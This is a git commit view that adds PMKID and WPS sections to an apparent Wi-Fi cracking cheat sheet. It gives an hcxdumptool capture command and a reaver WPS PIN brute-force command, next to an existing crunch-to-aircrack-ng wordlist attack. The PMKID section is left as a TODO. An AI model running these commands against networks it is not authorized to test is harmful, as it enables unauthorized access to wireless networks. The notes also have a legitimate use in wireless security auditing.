WPS method
This commit is contained in:
parent
8aabee0ac9
commit
68ce8262cd
1 changed files with 17 additions and 1 deletions
|
@ -42,4 +42,20 @@ crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filen
|
||||||
|
|
||||||
# Wireshark
|
# Wireshark
|
||||||
|
|
||||||
PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html>
|
PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html>
|
||||||
|
|
||||||
|
## PMKID method
|
||||||
|
|
||||||
|
```
|
||||||
|
hcxdumptool -i wlanX -o PMKID --enable_status=1
|
||||||
|
```
|
||||||
|
|
||||||
|
TODO...
|
||||||
|
|
||||||
|
## WPS method
|
||||||
|
|
||||||
|
AP must have WPS enabled with a PIN. Not PBC, push button.
|
||||||
|
|
||||||
|
```
|
||||||
|
reaver -i wlanX -b 00:23:B1:82:84:xx
|
||||||
|
```
|
Loading…
Reference in a new issue